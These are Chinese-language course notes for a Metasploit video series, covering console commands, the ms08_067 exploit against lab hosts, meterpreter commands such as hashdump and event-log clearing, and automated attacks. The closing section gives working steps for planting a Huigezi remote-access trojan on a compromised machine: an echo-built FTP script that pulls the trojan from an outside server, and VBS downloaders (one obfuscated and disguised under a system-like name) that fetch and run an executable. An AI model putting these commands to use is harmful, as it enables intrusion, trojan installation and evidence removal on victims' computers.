课程简介:Metasploit Framework是在2004年在美国拉斯维加斯Blackhat黑客大会上发布的,它的发布在安全界引发了强烈的地震,甚至有人把他形容为"可以黑掉整个星球".......
声明:此教程是讲MSF的应用,不是教攻击何种系统,所以不要挑刺。水平有限,权当科普,希望对大家能起到一个抛砖引玉的作用。并且演示中没有特意要求每一次都返回payload,因为在实际利用中不可能每次都成功利用。

课程列表如下:
===========================
|    Metasploit Framework Series Video    |
|                      ——by: beach                |
===========================
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]Introduction:
[01-]Whats the metasploit?
[02-]How to install MSF
[03-]Update and directory
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]User Interface:
Msfconsole interface:
[04-]Core commands
[05-]Exploits module
[06-]Payloads module
[07-]Attacking windows with MSF
[08-]Auxiliary,encoders,nops module
[09-]Msfcli interface
[10-]Msfweb interface
[11-]Msfd interface
[12-]Msfpayload and msfencode
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]Database support:
[13-]Database backend commands
[14-]db_autopwn
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]Advanced payloads:
[15-]Meterpreter payload
[16-]Vncinject payload
:::::::::::::::::::::::::::::::::::::::::::
[ .:. ]Others:
[17-]Fast-Track Autopwn
[18-]Auxiliary — Sqlmap
[19-]Fast-Track Sqlpwnage
[20-]Final video
:::::::::::::::::::::::::::::::::::::::::::
如何安装MSF
1.windows  下载程序一直next 同意安装nmap 和 winpscap
2.ubuntu环境安装MSF
a.首先需要安装一下 ruby解释器  apt-wet install ruby
b.打开另一个终端
下载MSF安装程序
命令  links  http://下载地址//
clear
ls-la  查看信息
chmod +x MSF.run   给MSF.run执行权限
./MSF.run          运行安装MSF  
yes 同意自动更新
cd /opt/metasploit3
cd msf3
接口
msfconsole
msfcli     命令行接口
msfencode
msfweb
任意目录执行 msf
ls -l /user/local/bin/msfconsole
漏洞利用程序模块  exploits
                  payloads
svn update  手动自动更新
help  打开帮助
如何更新MSF
windows平台  直接运行 msfupdate.bat
unix平台msfupdate
MSF目录结构:
data目录 meterpreter  passivex VNC DLLS
plugins  插件目录
scripts
.svn   subversion的一些文件
tools   工具
-----------------
最常用的MSF接口
Mmsfconsole
可以多会话并发执行
Ctrl+z 后台运行
Ctrl+c 停止
核心命令
?        帮助菜单   相当于help
back      从当前环境返回
banner    显示一个MSF图形
cd        切换目录
color     颜色    color ture/false
                  color auto
connect www.cctv.com 80  相当于telnet
exit      退出
info      显示一个模块或多个模块的详细信息
lrb       进入irb的脚本模式
jobs      显示和管理作业
kill      杀死作业
load      加载插件  load+插件名字
loadpath
quit      退出
resource
route     查看一个会话的路由
save      保存
search    搜索     -h帮助   rank级别
search -r great -t exploit    按好用程度搜索
show exploit
use exploit/windows/smb/ms_08_067_netapi
set  RHOST  192.168.0.1   设置
show options
show payloads  查看模块
sleep    多少时间内什么都不做
unload   卸载一个模块
unset    解除变量
unsetg   解除全局变量
use payload/......
show options
show exploit
version 显示MSF和控制台库版本好
明天继续
show exploits
列出模块
1.名字    等级   描述
2.漏洞命名规则  操作系统/服务/模块名称
info exploit/windows/wins/ms04_     tab键可以补齐
选择一个模块
use exploit/windows/vnc/...
选择选项
show options   required项  是必须设置的
show targets  查看可以攻击的目标
set option 值   例如  set SRVHOST 192.168.0.1
设置攻击目标          set TARGET 1
在show options  查看 设置好了没
第六讲
payloads   也就是shellcode  
use exploit/windows/vnc...
show options
show payloads
shell       得到一个shell
DLLinject   插入进程
patchup     修补漏洞
upexec      上传并执行一个文件
payload命名规则
bind   等待攻击者连接  
shell_find_tag
reverse_tcp  反向连接
设置payload
set PAYLOAD windows/shell/bind_tcp  绑定tcp
列出选项  show options
设置选项  set RHOST 192.168.0.1  设置远程主机
第七课
MSF攻击windows2000
expliot/windows/smb/ms08_067_netapi
PAYLOAD windows/shell/bind_tcp   比较简单的一个payload
目标     192.168.0.15
自己的ip 192.168.0.14
show  exploits    显示漏洞模块
找到模块名字   use命令选择
use exploit/windows/smb/ms08_067_netapi
show option   查看选项
set PAYLOAD windows/shell/bind_tcp
show options
set RHOST 192.168.0.15   设置远程攻击主机
set LPORT 5555    默认是4444修改端口5555
show  targets
exploit   攻击了
得到一个cmdshell了
之后通过ftp 或者 http 下载自己远控小马了
ctrl+z    放后台
sesstions -h  
sesstions -i 1   切入会话
ctrl+c结束
第八课
nops   shellcode躲避IDS
encoders   payloads躲避IDS
auxiliary  辅助的程序的模块很好的东西
第九课msfcli
命令行接口msfcli可以直接执行不需要先启动msfconsole
-S  模块信息
-P  相当于payload
./msfcli
-T  设置目标
-E  攻击
msfcli windows/smb/ms08_067_netapi  S 显示模块的详细信心
msfcli windows/smb/ms08_067_netapi  P 显示模块可用的payload
msfcli windows/smb/ms08_067_netapi  payload=windwos/shell/bind_tcp T
msfcli windows/smb/ms08_067_netapi  payload=windwos/shell/bind_tcp target=1 O
msfcli windows/smb/ms08_067_netapi  payload=windwos/shell/bind_tcp target=1
RHOST=192.168.0.15 LOPRT=11111 E
第十讲 MSFWEB
exploits
Auxiliary
payloads
console
sessions
options
终端  msfweb
打开给定的自己网址
从右往左
options 选择风格
sessions 会话
console
payloads
Auxiliary
exploits   利用模块
可以搜索 ms08_067
让我们选择攻击
自己根据之前学习的选择填写  就可以直接攻击了
比较方便人性化
第十一课 msfd interface
msfd -a 192.168.0.14 -p 55554
执行msfd监听ip 192.168.0.14的55554的端口
netstat -tnl  查看网络连接
利用nc连接上监听端口  nc 192.168.0.14 55554 连接上去
netstat -tlp  查看进程的pid
kill -9 16645   杀死进程
第十二课  msfpayload and msfencode
msfpayload 可以修改payload
msfencode  可以改变IDS
msfpayload  windows/exec cmd=dir p
里面还有空字节
msfencode  -l
msfpayload  windows/exec cmd=dir R | msfencode -b '0x00' -e x86/shikata_ga_nai p
第十三集:database backend commands
数据库后台命令
启动msf
help
db_driver
pwd
ls
db_create linux520
db_disconnect   断开与数据库的连接
db_connect linux520  连接已知的数据库
db_destroy  linux520  删除,linux520数据库
渗透有用的
db_import_ip_list
db_import_amap_mlog
db_import_nessus_nbe
db_import_nessus_xml
db_import_amap_xml
db_autopwn  对目标主机进行自动利用
第十四集:db_autopwn
db_autopwn【选项】
-h   帮助
-t   显示匹配的利用模块
-x  选择基于漏洞的模块
-p   端口
-e   运行
-r   反向连接的shell
-b   绑定shell
-q
-l
-X
-PI  只对开放这些端口的主机进行攻击
-PX
-m
db_connect linux520
db_namp -sV 192.168.1.15  需安装namp  获得一些信息
db_autopwn -p -e -b   自动尝试攻击
ctrl + c 结束它就可以了
session -l  查看会话
session -i  1
shell     就进入目标的cmd
第十五集:Meterpreter payload
一旦利用成功之后反弹一个shell
Meterpreter  命令

backgroup
channel
close
exit
help
interact  频道交互
irb
migrate
quit
read
run
use
write
文件系统命令
cat   查看
cd
del
edit
rm     删除
upload
clearev  请出事件日志
ps       列进程
reboot   重启
hashdump  SAM转移
///////////////////////////////////////
ipconfig  查看ip
route    路由
ps         进程
execute -c -f 'net user' 执行
read 7
hashdump           查看hash值
cat boot.ini       查看      
download boot.ini  下载
touch linux520.txt             建立linux520.txt文件
echo linux520 >linux520.txt    写入
upload  /root/linux520.txt c:  上传
c:/linux520.txt
第十六集:vncinject payload
第十七集:Fast-Track autopwn
高度自动化对目标主机进行攻击尝试
cd  /pentest/exploit/fasttrack/
ls
./fast-track.py -c
./fast-track.py -c 2
./fast-track.py -c 2 192.168.1.15 -r
db_autopwn -p -t -e -r
第十八集:Auxiliary sqlmap
MSF调用sqlmap.py对目标站点进行注入攻击
locate sqlmap.py
第十九集:Fast-Track sqlpwnage
高度自动化注入攻击和权限提升
第二十集:Final video
http://bolg.metasploit.com/
http://www.pffensive-security.com/metasploit-unleashed/
http://www.w00t-shell.net/
ftp传马命令与教程
假设我们已经有一个FTP服务器,上面有一个我们配置好的木马文件mhgz.exe,我们应该知道FTP
服务器的三个参数:
1、FTP服务器的IP地址:如1.1.1.1
2、FTP服务器的用户名:如test
3、FTP服务器的密 码:如test123
在远程计算机的C***下依次输入下面的命令:
1、echo open 221.202.50.125>>test.txt 登陆FTP服务器
2、echo 123>>test.txt 用户名
3、echo 123>>test.txt 密码
4、echo bin>>test.txt 开始
5、echo get mhgz.exe>>test.txt 下载灰鸽子木马
6、echo bye>>test.txt 关闭FTP服务器
输入上面命令后,在远程计算机上就会生成一个test.txt文件,内容为:
open 1.1.1.1
test
test123
bin
get mhgz.exe
bye
现在我们在远程计算机上执行下面的命令:
ftp -s:test.txt 意思是,读取test.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马
文件mhgz.exe就下载到对方计算机里了。
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
echo 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
echo bin >>c:\1.bat //登入
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
然后执行ftp -s:c:\1.bat即可
CMD下执行VBS下载脚本
在CMD中一条一条地敲如下语句:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >down.vbs
echo xPost.Open "GET","http://127.0.0.1/1.exe",0 >>down.vbs   
echo xPost.Send() >>down.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>down.vbs
echo sGet.Mode = 3 >>down.vbs
echo sGet.Type = 1 >>down.vbs
echo sGet.Open() >>down.vbs
echo sGet.Write(xPost.responseBody) >>down.vbs
echo sGet.SaveToFile "tt.exe",2 >>down.vbs
之后输入"cscript down.vbs"就执行了down.vbs
下载了tt.exe
4、vbs 下载者
1
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs
2
On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe‘
下载地址1:
查看当前『隐藏内容』需花费 60资源豆,【支付查看